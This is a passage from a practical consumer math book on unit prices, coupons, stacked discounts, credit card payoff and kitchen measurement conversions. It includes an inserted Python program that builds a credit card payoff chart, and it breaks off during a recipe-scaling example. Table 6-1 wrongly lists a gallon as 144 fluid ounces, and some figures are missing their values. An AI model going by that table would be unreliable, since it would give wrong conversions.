unit price = $4.45 / 35 
unit price = $0.127 


To calculate unit prices, use a calculator. Over time, you may find 
that you can make good approximations simply by doing the math 
in your head. 


Quantity pricing is super when you use a lot of an item, such as 
bottled water or paper towels. Common sense says that it’s not 
a good idea to buy big quantities of items you use sparingly (or 
rarely). 


Knowing the Real Cost of Sale Items 


A sale is a temporary reduction in the price of an item. Many 
merchants, big or small, local or national, have sales. Sales are 
popular because the idea of getting an item at a lower price than 
previously advertised appeals to many people. 


Sales may be seasonal (think post-Christmas), or pseudo-seasonal. 
A pseudo-seasonal sale is a “manufactured” sale, often citing a 
holiday. For example, think “Big Fourth of July Blowout!” No real 
reason exists for a sale on the Fourth of July. A closeout sale or 
clearance sale is intended to reduce the inventory of an item to 
zero. 


In your quest for a deal, be aware that not all sales — or bargains 
or discounts or coupons — are created equal. In the following 
sections, I tell you how to decipher which deals are worth pursuing. 


Bargain buying rules and cautions 


Judging a good deal is entirely subjective. For example, I have a friend who 
bought a used Rolls-Royce, and he felt that he got a very good deal. I don't need a 
Rolls-Royce, so the deal wouldn't appear to me to be a bargain. 


So before you plop down your hard-earned cash, ask yourself these simple 
questions when you find a “bargain.” Doing so will help you avoid making an 
irrational — and sometimes costly — decision: 


Do I need the item? If you need the item, it doesn’t matter if it's on sale, but so 
much the better if it is. If you were hesitating about buying this item, maybe a 
bargain price will get you to act. 


Is it “too good to pass up?” Really? If you don’t need the item, the benefit 
doesn't exceed the cost. Don’t buy. 


Can I afford the item? Not being able to pay for an item pretty much reduces 
the joy of owning it. 


Be prepared for “bargain hunter's remorse.” Later, you may realize that you could 
have done without the item entirely, or you may find that you could have bought it 
for less somewhere else. 


Counting coupons 


Some sales apply to everyone. Other sales are based on a coupon 
and apply only to people who present the coupon to get a 
reduction in price. (Interesting tidbit: The word coupon comes 
from the French couper, meaning “to cut,” and you generally cut 
coupons out of the newspaper.) 


Do coupons really save you money, and if so, how much? The 
following sections help you find out. 


Single item coupons 


The most common coupon is for a fixed amount off a particular 
item. Think “10 cents off on a 15 ounce can of Aunt Tillie’s Baked 
Beans,” for example. 


What does $0.10 off really mean? It’s an absolute reduction of 
$0.10. It doesn’t amount to a hill of beans whether Aunt Tillie’s 
Baked Beans normally sells for $1.49 or $1.99; the coupon still 
reduces the price by 10 cents. 


Grocery coupons almost always apply to brand name items. 
Compare the sale price of the brand name item to the price of its 
generic equivalent to see where the bigger savings are. 


All-item coupons 


You may receive a coupon that applies to all or almost all items in 
a store. Figure 5-7 shows such a coupon. 


Unfortunately, the coupon requires a $75.00 minimum purchase. 
You have to spend $75.00 to save $10.00. If you don’t need $75.00 
worth of merchandise, the coupon isn’t useful. 


OfficeCity    Expires 6/23/12 


$10 OFF 


your in-store purchase 
of $75 or more, 
excluding all computers. 


Figure 5-7: An all-item coupon. 


Calculating percentage decreases: You save 10 percent! 


Sometimes you see an advertised discount, such as “Take 10 percent 
off any item in the store.” If the deal applies to everything in the 
store, that’s good. If it applies to the total cost of multiple items, 
that’s better yet! 


A 10 percent discount is easy to calculate. In fact, you can do it in 
your head. Just take the item’s price and move the decimal point 
one place to the left. A 10 percent discount on a $70.00 item is 
$7.00. Alternatively, you can perform this calculation: 


discount = regular price x 0.10 
discount = $70.00 x 0.10 
discount = $7.00 


Figuring the discounted amount is easy, too. Just subtract the 
discount from the regular price. 


discounted price = regular price - discount 
discounted price = $70.00 - $7.00 
discounted price = $63.00 


Calculating the real percentages in “get one free” offers 


“Get one free” offers come up from time to time. The most common 
is “Buy one, get one free,” but occasionally you see other versions 
(like around July 4th, when fireworks retailers offer “Buy five, get 
one free” deals). Calculating the average price is as simple as 
dividing the price for one item by the number of items. In the “buy 
one, get one free” scenario, you divide by 2 items. 


average price of item = (regular price + price of free item) / number of items 
average price of item = ($7.00 + $0.00) / 2 
average price of item = $7.00 / 2 
average price of item = $3.50 


The average price is $3.50 per item. When a $7.00 item sells for 
$3.50, that’s a 50 percent discount. 


“Buy two, get one free” offers are also common. The math is similar. 


average price of item = (regular price + regular price + price of free item) / number of items 
average price of item = ($7.00 + $7.00 + $0.00) / 3 
average price of item = $14.00 / 3 
average price of item = $4.67 


The average price is $4.67 per item. When a $7.00 item sells for 
$4.67, it’s selling for 67 percent of its regular price. That’s a 
33 percent discount. 




A typical variation is what I call the “Buy 1 and Don’t Get Another 
One Free.” These coupons will offer a second item but not for free. 
Usually a small cost is associated with it, as well as a requirement to 
buy some other item. The coupon in Figure 5-8 gives you a second 
sandwich for $1.00, as long as you buy the first sandwich and a 
beverage. 


[Coupon: Hoagie Haven. $1 Turkey & Bacon Avocado 6” hoagie when you buy a 6” Turkey & Bacon Avocado hoagie and a drink. Offer only valid at participating Hoagie Haven locations. This coupon cannot be used in conjunction with any other offers. Cannot be redeemed for cash. Additional charges may apply. Not for sale. All rights reserved. Expires 8/17/12.]

Figure 5-8: A variation of the typical “buy one, get one free” deal. 


Dealing with dining specials 


Restaurants have a coupon variation that you’ve probably seen. 
“Buy one entrée at full price and get a second entrée (of equal or 
lesser value) for half price.” Is that a deal, or what? 


You develop the answer with a tried-and-true costing technique: 
List the factors, figure in the tax and tip, and add everything up. 
Figure 5-9 shows you how. 


Item                  Without Coupon   With Coupon 
Entrée #1             $15.00           $15.00 
Entrée #2             $15.00           $7.50 
Beverages             $4.00            $4.00 
SUBTOTAL              $34.00           $26.50 
Tax (7.75 percent)    $2.64            $2.05 
SUBTOTAL              $36.64           $28.55 
Tip (15 percent)      $5.50            $4.28 
TOTAL                 $42.14           $32.83 


Illustration by Wiley, Composition Services Graphics 


Figure 5-9: Calculating savings on a “buy one, get one half off” deal. 

Entrée #1 is $15.00 with or without the coupon, but with the 
coupon the price of Entrée #2 drops from $15.00 to $7.50. That’s a 
nice savings. Beverages aren’t part of the deal. 


In theory, you should tip on the undiscounted prices. In real 
life, the server takes his or her chances. On the other hand, you 
shouldn’t tip on taxes, but people do anyway. 


Doubling down on discounts 


Discounts are consistent reductions in the basic price of goods or 
services. That’s a bit different from coupons and sales. While 
coupons expire and a sale may last a day or a week, discounts tend 
to apply all the time. 


The merchant discounts prices in the hope of attracting customers 
who might not otherwise be able to buy (seniors on a fixed 
income, for example). Also, the merchant may want to increase 
traffic during otherwise slow times (for example, matinee showings 
at movie houses and pre-dinner hours at coffee shops). 


The purpose of discounts is to attract and build business. For that 
reason, merchants can be infinitely resourceful about offering 
them. You can find an incentive discount for practically everyone. 
You see student discounts, employee discounts, military discounts, 
child discounts (think “Kids eat for free!”), and senior discounts. 
Other discounts are available if you’re a member of an organization. 
A prominent example is the American Association of Retired 
Persons (AARP), which offers members discounts on practically 
everything, including travel, entertainment, prescription drugs, and 
insurance. 


Your real-life math task is to calculate discounts and make good 
math-based judgments. 


Basic discount math 


Discounts can come in various forms. Some discounts are a 
percentage (“10 percent off to seniors”), and some are a lower 
price (“$2.00 off for seniors”). Some discounts are in effect for part 
of the day (“early bird” specials at the coffee shop, for example). 


Most discount math is incredibly simple. Just subtract the 
discount. For example, if a regular ticket price is $8.00 but seniors 
or students get $3.00 off, the cost of the ticket is $5.00. 

No percentage calculations are required for this coffee shop 
special: “Two early bird dinners for $12.00.” What could be simpler 
than dividing by 2? 

discounted price per meal = total price / number of meals 
discounted price per meal = $12.00 / 2 
discounted price per meal = $6.00 


To see your savings, just subtract the discounted price from the 
regular price. If a meal is normally $8.95, and you’re paying $6.00, 
you save $2.95. 


Determining the real discount in “double discounts” 


You'll love this. The ad says “Double discount! Everything in the 
store 25 percent off! And take another 25 percent off at the register!” 


You get a 50 percent discount, right? Wrong, wrong, wrong! It’s 
really a 44 percent discount. Look at this $10.00 item when double 
discounted: 


final price = regular price x 0.75 x 0.75 
final price = $10.00 x 0.75 x 0.75 

final price = $5.625 

final price = $5.63 rounded 


A discount of 25 percent means that you’re paying 75 percent of an 
item’s regular price. When you calculate the discount two times, 
the answer is not 50 percent. The second discount applies to the 
first discount amount. In the example, the first discount takes the 
purchase price from $10.00 down to $7.50. Then the second discount 
is applied, taking the final price to $5.63. That’s not the same thing 
as $5.00, the amount you probably expected to pay. 


How Do You Wanna Pay for That? 


When you shop, you can pay in several ways: cash, check, money 
order, on account, debit card, PayPal, and credit card. Each 
method has advantages and disadvantages. 


Paying with cash: This form of payment completes a 
transaction. There are no debit card entries or credit card 
statements to worry about. You rely on the merchant to stand 
behind the purchase. 

Paying by check: Checks represent cash, but some merchants 
are reluctant to take them. They feel that they’ve been burned 
too many times by bad checks. 


Paying with a money order: Money orders are a useful way 
to pay some bills by mail. Because you buy them with cash, 
you have no debt worries. 


Buying on account: You can buy “on account” at some stores, 
a method often used by small businesses. You get a monthly 
statement and then write one check to the merchant for all 
purchases made during the month. 


Paying with a debit card: Also known as an ATM card, 
purchases with a debit card complete a transaction. As soon 
as you pay, the amount is almost instantly removed from your 
bank account. 


Paying with PayPal: PayPal is usually required for eBay 
purchases and is often an option with other online vendors. 
Paying with PayPal is a little like paying with a debit card, 
because PayPal immediately debits your checking account. 


Paying with a credit card: Credit cards are convenient and 
honored almost everywhere. The merchant is paid by the 
credit card issuing bank, and you pay the issuer when you 
get a monthly statement. Because it’s essentially a consumer 
loan, you decide how much and when to pay it off. Credit 
cards offer some protection if a merchant won’t make good on 
a defective product, because the bank that issues the credit 
card will usually reverse a charge if you have a dispute. 


Capturing bargains with credit cards 


Credit cards are one of the most convenient ways to pay. In fact, 
sometimes they are too convenient, because they can put you in 
serious debt (which I explain in Chapter 10). But they do offer a 
little-known advantage: The credit card is a great tool for capturing 
bargains. For example, if a giant big screen HDTV is on sale for 
$750.00 and it’s normally $1,500.00, maybe you should buy it now. 
Most likely, you will use a credit card to pay for it. 


Another advantage to paying by credit card is that you can choose 
how fast you want to pay down your credit card balance. But be 
careful, because that advantage can turn into a liability, and you 
may be paying off that HDTV forever. 

A disadvantage is that you have to pay interest, typically at 18-21 
percent per year, if you don’t pay off your balance each month. 
Another disadvantage is that you may go overboard and buy more 
than you can realistically pay off. 


Follow these basic rules to use credit cards wisely: 


Ask yourself whether the purchase is worth it. If the item is 
essential (for example, school clothes for the kids), use the 
credit card. 


Ask yourself when the item will wear out. If the item is used 
up before it’s paid off, buying with a credit card is a bad idea. 
This is especially true of meals and admission to theme parks. 
If the purchase will last a while (like that great power saw at 
Home Paradise), it’s probably okay to charge it. 


Ask yourself whether paying by credit is more convenient. 
Paying with a credit card is far more convenient when you’re 
not sure exactly how much cash you’ll need to make the 
purchase (an expensive meal out, for example). 


Ask yourself whether you can pay off the charge. 
Remember that a little bit of every purchase contributes to 
your credit card balance, until the balance is zero (see 
Figure 5-10). The only way to avoid this “growing balance” is 
to pay off your balance each month. 


In this example, you’ve made five payments of $50.00. That’s 
$250.00. But if the interest rate is 18 percent per year, you’ve only 
lowered your balance by $191.93. Note that you charged both an 
HDTV and a dinner. The HDTV will last a long time, but that dinner 
lives only on your waistline. 


New Charges       Starting Balance   Monthly Interest   Payment   Ending Balance 
HDTV $750.00 
Dinner $100.00    $850.00            $12.75             $50.00    $812.75 
                  $812.75            $12.19             $50.00    $774.94 
                  $774.94            $11.62             $50.00    $736.56 
                  $736.56            $11.05             $50.00    $697.61 
                  $697.61            $10.46             $50.00    $658.07 

Figure 5-10: A growing credit card balance. 

You can use your math skills to build a payoff chart. Take the 
starting balance, add in interest (at the monthly rate of 1/12 the 
annual percentage rate), and subtract the payment. You will get an 
ending balance. 
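
The payoff chart described above, worked as a short Python program. This is an added example, not part of the original book: the function names are hypothetical, and rounding each month's interest to the nearest cent is an assumption that reproduces the figures in Figure 5-10. It also carries the chart through to a zero balance and rejects a payment too small to ever pay the card off.

```python
from decimal import Decimal, ROUND_HALF_UP

CENT = Decimal("0.01")


def to_cents(amount):
    """Round a Decimal to whole cents, with halves rounding up."""
    return amount.quantize(CENT, rounding=ROUND_HALF_UP)


def payoff_chart(balance, apr_percent, payment, max_months=None):
    """Build the chart as a list of (starting, interest, payment, ending) rows.

    Each month follows the rule in the text:
      interest = starting balance x (annual rate / 12)
      ending   = starting balance + interest - payment
    The chart stops when the balance reaches zero, or after max_months rows.
    """
    balance = to_cents(Decimal(str(balance)))
    payment = to_cents(Decimal(str(payment)))
    monthly_rate = Decimal(str(apr_percent)) / Decimal(100) / Decimal(12)

    rows = []
    while balance > 0 and (max_months is None or len(rows) < max_months):
        interest = to_cents(balance * monthly_rate)
        if payment <= interest:
            # The payment does not even cover the interest, so the
            # balance would never shrink.
            raise ValueError("payment never reduces the balance")
        # The final payment only needs to cover what is still owed.
        paid = min(payment, balance + interest)
        ending = balance + interest - paid
        rows.append((balance, interest, paid, ending))
        balance = ending
    return rows


def summarize(rows):
    """Return (total paid, total interest, amount the balance dropped)."""
    total_paid = sum(row[2] for row in rows)
    total_interest = sum(row[1] for row in rows)
    reduction = rows[0][0] - rows[-1][3]
    return total_paid, total_interest, reduction


if __name__ == "__main__":
    # The book's example: $750.00 HDTV + $100.00 dinner, 18 percent per
    # year, five payments of $50.00.
    first_five = payoff_chart(850, 18, 50, max_months=5)
    for starting, interest, paid, ending in first_five:
        print(f"${starting:>8}  ${interest:>6}  ${paid:>6}  ${ending:>8}")
    paid, interest, reduction = summarize(first_five)
    print(f"Paid ${paid}, of which ${interest} was interest; "
          f"balance lowered by ${reduction}")

    # The same card carried all the way to a zero balance.
    full = payoff_chart(850, 18, 50)
    paid, interest, _ = summarize(full)
    print(f"{len(full)} payments, ${paid} paid in total, ${interest} interest")
```
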


For advice and strategies for avoiding or getting out of credit card 
trouble, head to Chapter 10. 


Taking advantage of layaway 


Layaway is a way to buy an item without paying for it all at one 
time but avoiding using credit. The merchant “lays away” the item 
for you in storage, and you don’t get it until you’ve completely paid 
for it. 


Here are the advantages of layaway: 


After you’ve paid for it completely, the item is yours, all 
yours. If you change your mind and don’t complete the 
transaction, the item goes back into stock and you get your 
money back (but you’re charged a small fee). 


The price is fixed, and you’re not charged interest (as you 
would be with a credit card). 


The availability of the item is guaranteed, because it has been 
laid away. 


As a bonus, you may also gain a sense that you're living within 
your means. 


Layaway was a big deal during the Great Depression, and it has 
been making a comeback, especially during the last several 
Christmas shopping seasons. Why Christmas? Because that’s the 
season when many retailers make most of their money, and they 
want to encourage sales. 


Discovering Deals at the Grocery 


The supermarket is a super place to compare prices and discover 
deals. Why? The Food Marketing Institute reports that, as of 2010, 
the average grocery store has about 38,718 items. Giant stores 
have as many as 60,000 items! 




In this section, I share the math you need to know to estimate your 
grocery bill, estimate how much you need to buy, and find the best 
deals. 


There are several simple estimates you can make. You may be 
making them already when you shop. The whole point is to find 
the greatest benefit with the least cost. 


Estimating the whole grocery bill 


You can estimate your entire grocery bill by keeping a running 
total in your head, on a piece of paper, or on a smartphone. To 
make the task simpler, just round up each item’s price. For example, 
if a can of vegetables is priced at $0.89, call it $1.00. When you 
reach the checkout, your estimate will be a little high, and so you 
won’t be surprised at the total. 


If it seems like too much effort to estimate the sum of all items, try 
doing it with only the most expensive items you buy. That estimate 
will give you a sense of how “big impact” items are affecting your 
grocery bill. 


In trying to determine your whole grocery bill, don’t forget to 
include taxes. For most stores, just add 10 percent. Take your 
estimated balance and move the decimal point one place to the 
left. For a purchase of $70.00, estimate paying about $7.00 in sales 
tax. Because some states don’t charge sales tax, other state and 
local sales taxes haven’t hit 10 percent (yet), and many don’t tax 
food items and medicine, your estimate will be high. Which means 
you'll get a pleasant surprise at the checkout. 


Estimating how much to buy 


Charity begins at home, and so does estimating. You benefit by 
knowing how much to buy before you turn yourself loose at the 
grocery store. For example, if you’d like to serve a standing rib 
roast at a big family meal, know your needs in advance: 

To feed 6 people, buy a 3-rib roast. 

To feed 8 people, buy a 4-rib roast. 

To feed 10 people, buy a 5-rib roast. 

To feed 12 people, buy a 6-rib roast. 

To feed 14 people, buy a 7-rib roast. 

The math is simple. Begin by looking up recipes to determine what 
an average serving size is (the Internet is a good place to look), and 
then multiply the serving size by the number of guests. For a rib 
roast, for example, you'll want to allow 1 rib for every 2 guests. Be 
careful! The last time I looked, a full 7-rib roast cost about $104.00! 


Steamed clams are easier. There are generally 12 to 15 clams per 
pound. Serve 1-2 pounds of steamer clams per person (most of the 
weight is waste — the shell). If you’re serving 4 guests, you’d want 
4-8 pounds. 


Comparing unit prices 


Grocery deals are based almost entirely on price. Generally, the 
lowest price wins. When you’re comparing items, try to compare 
apples to apples. Shallots, for example, cost about six times what 
yellow onions do, so comparing shallots to yellow onions isn’t 
really fair. 


You calculate deals based on unit price. Sometimes, the store 
practically gives this information away; sometimes, you have to 
calculate to get it. 


Some grocery stores feature unit pricing on the shelf, not on the 
item. Figure 5-11 is an example of a unit pricing label. 


Figure 5-11: A unit pricing label. 


Look carefully. The cost of a jar of pickles is $3.99, but the unit 
price is $0.065 per ounce. If you know the unit price, you can easily 
compare this product to other brands and other sized jars of 
pickles. 

Comparing products per roll or square foot 


You can compare items such as aluminum foil, plastic wrap, paper 
towels, and toilet paper in several ways. Methods include per roll 
and per square foot. 


Comparing prices of the same brand of paper towels by package 
size is easy. You can practically do it in your head. Just divide the 
price by the number of rolls in the package. Figure 5-12 shows a 
comparison between a single roll of paper towels, selling for $2.59 
and a 3-roll package selling for $6.29. 


Comparing Number of Rolls    Price    Price Per Roll 
Paper towels — 1 roll        $2.59 
Paper towels — 3 rolls 

Figure 5-12: Comparing one to many. 


In Figure 5-12, you can see that the unit price for 3 rolls is less than 
the unit price for 1 roll. 


For aluminum foil or plastic wrap (or anything sold by the square 
foot), you compare by square footage. The comparison is easy, 
because the number is right on the package. Figure 5-13 compares 
three rolls of aluminum foil. 


Comparing Square Footage    Price 
Brand name — 50 SF          $4.49 
Store brand — 50 SF         $2.99 
Store brand — 75 SF 

Figure 5-13: Comparing by square foot. 


When you compare 50 square feet (SF) of the brand name foil with 
50 square feet of the store brand, you see a big difference in price. 
But wait! Who would have expected that the store had 75 square 
foot rolls on sale? That 75 SF roll costs less than the 50 SF roll. 

Calculating volume (25 percent more free!) 


Liquid volumes are calculated in fluid ounces and in liters. 
Comparing for value can be incredibly simple. When quantities are 
the same (for example, 2-liter bottles of soft drinks), just compare 
the prices. The same is true when comparing six-packs of 12 ounce 
(355 mL) soft drinks. 


Comparing two items with different volumes gets a little tricky. But 
after a while you can do it in your head. The idea is to make the 
different volumes more or less equivalent to each other. For example, 
a six-pack of cola has 6 cans with a capacity of 355 mL. Think “2 
cans contain about 700 mL, so 6 cans contain about 2,100 mL.” 
Well, 2,100 mL is only a little more than the volume of a 2-liter 
bottle (2,000 mL). Say the six-pack sells for $2.99, while the 2-liter 
bottle of the same product sells for $1.99. Buy the big bottle. 


Determining Where to Shop 


Your money is important, not just to you, but to retailers. Every 
time you shop, you're essentially voting for something — for a 
product or a merchant. If you think about it, that makes you a very 
powerful person. A store may not know you as an individual, but as 
part of the buying public, you can help its prosperity or put it out 
of business. 


Narrowing your choices 


A key component is choosing where to shop. Each type of store 
can fill a need, so where you shop depends on your needs. You 
might go to a superstore to save money on groceries, but you 
might also go to a specialty grocery store to find Italian, Jewish, 
Mexican, Chinese, or Thai items you can’t get anywhere else. There 
are also specialty stores that sell only meat, fish, or cheese. 


Narrow your shopping choices down to three types: local stores, 
big box stores, and online stores. Each type of store has advantages 
and disadvantages for you: 

Local stores: These stores are close by. They are usually 
owned by people in your community. Some stores (think 
Kmart or Safeway) are “corporate” stores but employ people 
in your community. 


Big box stores: These stores may be near you, or they may 
require a bit of a drive. They are known for their giant size 
and very low prices. 


Online stores: Online stores have no “brick and mortar” store 
at all. They are highly convenient places to shop. However, 
you can’t hold the merchandise in your hands. A nice delivery 
service will bring your purchase to you, so you don’t have to 
drive a car (but you do have to pay for shipping). You don’t 
even have to dress up, for that matter. 


Looking at externalities 


These days, every consumer has to be an economist. It seems as 
though you need to know everything from the cost of the money 
that funds your mortgage to the value of the renminbi (the currency 
of the People’s Republic of China). So you should know 
about externalities. 


An externality is a cost or benefit that isn’t transmitted by prices. A 
negative externality is a cost that the creator of a problem doesn’t 
bear. “Nobody” pays for it, except that we all pay for it. You could 
call it “playing for free.” For example, if a chemical company pollutes 
a river, “nobody” pays for it, except that the costs of cleanup come 
out of everyone’s taxes. If a local store closes, “nobody” except 
the store takes a loss, except that that community may have new, 
unexpected costs to bear. 


Rest assured that shopping can produce negative externalities. 
For example, if you drive a long way to a superstore, the air gets 
polluted and the roads wear out. Negative externalities are difficult, 
but not impossible, to compute, and they are reported in newspapers 
and online. As consumers become more aware of them, 
they demand changes. It’s mainly a matter of considering the overall 
costs and benefits of your shopping choices. 


There are positive externalities, too. For example, when a new 
store opens, the store hires employees. The employees buy homes 
and pay taxes that help the schools. 

The impact of your shopping choices 


Where you spend your money determines the success or failure of businesses. You 
can have a big impact on business, which is only fair, because some businesses 
can have a big impact on you. 


The study of economic and social impacts is a broad field. You just need to know 
the basic principles. By knowing the principles, you can use your math skills to get a 
sense of the impact your decisions about where to shop have. If the concept can be 
boiled down to one general principle, it would be that everything affects everything. 
Your shopping choices matter! 


Gauging the impacts of different store types 


Each store type has both direct and indirect impacts on a community. 
Consider what happens when a big box store opens and local 
merchants go out of business. To put it simply, an indirect impact 
is when your neighbor loses his or her job. A direct impact is when 
you lose your job. 


Impact of the big box store 


The biggest impact of a big box store is that it may cause local 
business to fail. For example, if a local supermarket closes, you can 
calculate the cost of this closure by using simple multiplication. Just 
multiply the average salary by the number of employees out of a 
job. For example, if the average salary is $20,000.00 and the local 
store had 93 employees, your community has lost $1,860,000.00. 


93 x $20,000.00 = $1,860,000.00 


In other words, the economic impact of the store closing is a loss 
of about $1.9 million. 


The social impact can be far-reaching, too, especially if the laid-off 
employees can’t easily get new jobs. That situation may stress the 
Temporary Assistance for Needy Families program (sometimes 
called welfare) and the resources of the churches and food banks. 

When a local store stays open, there’s also a “multiplier effect.” 
Store employees spend their paychecks at other local stores and 
make donations to local charities. 


The prices at big box stores are very low, but if they require a 
drive to get there, you create a bigger carbon footprint than if you 
had shopped locally. And, bluntly, some big box stores have a 
reputation for paying low wages and not offering healthcare 
benefits. 


Impact of online shopping 


Shopping online may or may not produce lower prices. Sometimes, 
the base price “giveth,” but shipping costs “taketh away.” Figure 5-14 
shows a price comparison between buying a TV online and buying 
one at a local store. The math is a simple cost comparison. Find 
the items that make up the total cost of acquisition, and add 
everything up. 


Item Local Online 
Television $200.00 $180.00 
Delivery $0.00 $24.00 
Tax (8 percent) $16.00 $0.00 


Total cost $216.00 $204.00 

Figure 5-14: Comparing online and local shopping. 


In this example, you avoid paying sales tax (although this is 
changing), but you pay for shipping. In the end, you save only a 
few dollars. When the government requires all online vendors to 
charge sales tax, you may end up paying more for an online 
purchase than a local purchase. 


Online shopping reduces your carbon footprint. It also reduces 
the volume of business for local merchants. You also give up the 
opportunity to handle the merchandise. 


Online purchases require you to use a credit card, debit card, 
or PayPal to make the purchase. If you feel uncomfortable using 
these payment methods online, you probably won’t be able to buy 
online. 


Be careful of online purchases where the item costs $5.00 but the 
shipping cost is $10.00. This really happens! 


Chapter 6 


Mmm, Mmm, Good: Kitchen Calculations 


In This Chapter 
Converting measurements when you’re cooking 
Making recipes bigger and smaller 
Figuring whether buying food in quantity is a good deal 


The kitchen’s a great place to hone your math skills. After all, 
you’re doing math already, whether you know it or not. Having 
a few math tools and simple techniques at your disposal makes 
cooking better and easier, and the results of your math work will 
taste great! 


In this chapter, I tell you how to convert from one measurement 
unit to another (a very common dilemma in kitchens everywhere), 
how to scale a recipe up or down so that you make just 
the number of servings you need, and how to apply math to some 
everyday cooking and purchasing tasks. 


Taking Measure 


Measuring ingredients correctly makes you a better cook (well, at 
least, a more accurate cook). To measure ingredients accurately, 
you need to understand the most common measurement units in 
the kitchen, and you need to know a bit about equivalencies — 
both of which are covered in the following sections. 


Knowing your units 


In the kitchen, you measure (and sometimes convert) volume and 
weight. In order to perform that task, you need to understand systems 
of measurement and units of measure. 

The United States uses the U.S. customary system of measurement 
(sometimes called the American system). Some of the units are 
very common in the home, especially in the kitchen, and are often 
referred to collectively as the household system. 


The American units you will likely encounter in the kitchen are 


Mass: Mass (weight) is measured in ounces (oz) and pounds (lb). 


Liquid volume: Liquid volume is measured in fluid ounces (fl 
oz), pints (pt), quarts (qt), and gallons (gal). Other common 
units include teaspoons (tsp), tablespoons (tbsp), and cups (C). 


In the past, the imperial system (also known as the British Imperial) 
was the rule for countries in the British Empire. The system has 
(among other things) a larger gallon than the American system. 
Since 1995, the United Kingdom has used the metric system. So 
does every country in the world, except for the United States, 
Burma (Myanmar), and Liberia. 


The metric units you will likely encounter in the kitchen are 


Mass: Mass (weight) is measured in grams (g) and kilograms (kg). 


Liquid volume: Liquid volume is measured in milliliters (mL), 
deciliters (dL), and liters (L). 


Length: Length is measured in millimeters (mm) and 
centimeters (cm). 


You use a couple other measurements every day in the kitchen, 
but they don’t come up on any formal list of units: 


Temperature, measured in degrees Fahrenheit or Celsius 


Time, measured in seconds, minutes, and hours 


“Per each” units or fractions of units, such as butter (that is, 
1 stick) and fruit or vegetables (that is, 1/2 lemon, 2 medium 
onions, 2 eggs, and so on) 


Temperature and time are pretty much things you just set (but 
don’t forget), but you may find yourself needing to change “per 
each” units according to your needs. 

Equivalencies — All things being equal 


Which is more, 4 fluid ounces of milk or 1/2 cup of milk? Neither. 
They’re both the same quantity. And that’s what an equivalent 
is. How many teaspoons are in a tablespoon? That’s another 
equivalent. The answer is 3. 


Knowing things like how many pints are in a quart or how many 
teaspoons are in a tablespoon comes in mighty handy in the 
kitchen, especially when you're scaling recipes (the topic of the 
next section) or when you don’t have the appropriate tool to 
measure in the unit the recipe specifies (say the recipe calls for 
fluid ounces but you need to know what it is in cups). 


The solution? Memorize the equivalencies you use most or trust 
a handy-dandy source, like Table 6-1, which lists common 
equivalencies that practically do the work for you. 


Table 6-1 Common Equivalencies 

Name                                American Equivalent                           Metric Equivalent 
1 teaspoon                                                                        5 milliliters 
1 tablespoon                        3 teaspoons                                   15 milliliters 
1 cup                               8 fluid ounces                                240 milliliters 
1 pint                              2 cups, 16 fluid ounces                       480 milliliters 
1 quart                             2 pints, 4 cups, 32 fluid ounces              960 milliliters, 0.96 liters 
1 gallon                            4 quarts, 8 pints, 16 cups, 144 fluid ounces  3.785 liters 
1 deciliter                         3.38 fluid ounces                             100 milliliters 
1 liter                             33.8 fluid ounces                             1,000 milliliters 
1 ounce                                                                           28.35 grams 
1 pound                             16 ounces                                     454 grams 
1 inch                                                                            25.4 millimeters, 2.54 centimeters 
10 inches (cucumber, for example)                                                 25.4 centimeters 

Most kitchens have the basic tools (measuring spoons and 
measuring cups) that make kitchen math possible. If you do a lot 
of cooking (and hence a lot of kitchen math), two great options are 
a digital scale and a digital timer. Neither is absolutely necessary, 
but both can help you. Without them, you may end up doing “time 
math” and “weight math” the whole time you’re cooking. 


The digital timer counts down to show how much cooking 
time’s left for a dish, which is much more convenient than 
looking at the clock, adding cooking time to determine the 
time when a dish will be done, and then having to watch 
that clock. The timer can also count up to show how long 
something has been cooking. 


The digital scale is an inexpensive, easy, precise way of 
measuring ingredients by weight in both American and metric 
units. It sure beats guesstimating, which nobody does very 
well. To me, 3 ounces, 4 ounces, and 5 ounces of an ingredient 
all look about the same. 


Scaling a Recipe 


Typical recipes are great if you are an average household, but 
most families aren’t average. Many people, young and old, live 
alone, and many couples delay having children for a while. Young 
children eat like, er, children, but older children eat more like 
adults. Also, a recipe for a family won’t work when friends (or all 
the relatives) are coming over. That means that most recipes need 
some adjustment. 


So what do you do when a recipe says it will yield four or six 
servings, but you want to feed more or fewer people? You change 
the recipe to produce the number of servings you want. This is 
called scaling a recipe. To increase the number of servings, you 
scale up a recipe. To decrease the number of servings, you scale 
down a recipe. 


The keys to scaling a recipe 


You can scale up or down in either of two ways: by percentage or 
by ratio-proportion. Here’s a quick rundown of how to use each 
method: 

Scaling by percentage: Find the percentage increase or 
decrease between the number of portions given and the 
number of portions you want, and apply the percentage to 
each ingredient. This method is fast, especially when the 
percentage increase or decrease is a nice round number. 


Scaling by ratio-proportion: Use the ratio of the number of 
portions given to the number of portions you want and apply 
it to the ratio of the given amount of each ingredient to the 
amount you need. This method shows you the clearest 
picture of the relationship between old and new amounts. 


Scaling in action 


To see how scaling works, consider a simple spaghetti meal that 
serves 4. It has only 3 major ingredients: 


16 ounces uncooked spaghetti 
24 ounces spaghetti sauce, made from crushed tomatoes 
6 ounces Parmesan cheese 


You'll want to add garlic, thyme, oregano, basil, marjoram, bay 
leaf, salt, and pepper as well, but the amounts of these ingredients 
are based on your personal preference. 


Now say that you’re having 12 people over on Saturday night. Since 
the recipe makes 4 servings, you need to multiply the ingredients 
by 3 to get the 12 servings you need (4 servings x 3 = 12 servings). 


Or maybe only you and another person are eating, so you want 
2 servings instead of 4, especially if you hate leftovers. How much 
of the ingredients do you need now? In this case, the solution — 
halving the recipe or dividing all the ingredients by 2 — may be 
apparent. With a simple recipe like this one, you see that mental 
math produces fast answers. (See Chapter 4 for more calculations 
you can do in your head.) 


But suppose that the solutions don’t just pop into your head or 
that the recipe is much more complex, with many more ingredients 
needed in much more precise quantities. That’s when the two 
scaling methods can come in handy. I use a simple recipe in the 
following examples, but the math works with complicated recipes, 
too. After a while, you’ll be able to do the math in your head and 
just write down the revised quantities on the recipe. 
Scaling up and down by percentage 

To scale up by percentage, do the following. 


1. Calculate the percentage you need to increase each 
ingredient. 
Use this calculation: 


percentage = (desired servings / recipe servings) x 100 
percentage = (12 / 4) x 100 
percentage = 3.00 x 100 
percentage = 300 percent 


2. Multiply each ingredient by the percentage. 


In this example, the percentage is 300 percent, so you 
multiply each ingredient by 3.00: 


Spaghetti = 16 oz x 3.00 = 48 oz 
Sauce = 24 oz x 3.00 = 72 oz 
Parmesan = 6 oz x 3.00 = 18 oz 


Now you know that you need 48 ounces of spaghetti, 72 ounces of 
